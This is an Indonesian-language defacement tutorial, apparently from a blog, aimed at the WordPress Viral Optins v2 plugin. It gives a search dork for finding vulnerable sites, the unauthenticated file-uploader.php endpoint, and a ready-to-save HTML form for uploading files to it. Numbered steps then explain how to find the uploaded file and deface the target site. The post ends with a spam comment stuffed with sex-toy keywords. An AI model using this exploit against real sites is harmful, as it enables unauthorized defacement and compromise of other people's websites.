Deface Metode Wordpress Viral_Optins v2
[+]Dork : inurl:/wp-content/plugins/viral-optins/
[+]Exploit : http://target/wp-content/plugins/viral-optins/api/uploader/file-uploader.php
[+]CSRF:
<font color="red">
<h1 align="center">Viral Optins CSRF</h1></font>
<br>
<body background="black"><style>body {background:black}
input,submit {border:1px;solid green;color:green}</style><center>
<form method="POST"
action="http://target.com/wp-content/plugins/viral-optins/api/uploader/file-uploader.php"
enctype="multipart/form-data" > <input type="file" name="Filedata"></center><br>
<input type="submit" name="Submit" value="Cheers">
</form></body>
note:save as .html
1.Dorking dulu dengan dork diatas.ciri ciri web yang vuln adalah blank biasanya ada kotakan putih kecil di pojok.Seperti ini:
2.masukan target nya tadi ke csrf terus buka dan masukan file nya.klik cheers.
 |
| ext allowed: .txt and .jpg |
3.kalo sukses terupload akan terlihat gambar yang pecah seperti dibawah ini.Nah akses file nya tinggal salin url nya atau http://target/wp-content/uploads/(tahun)/(bulan)/namafile
4.binggo .
l530k7mjdxs848 prostate massagers,realistic dildo,Panty Vibrators,G-Spot Vibrators,sex toys,wolf dildo,finger vibrator,dog dildo,realistic sex dolls n074n8uecjb479
ReplyDelete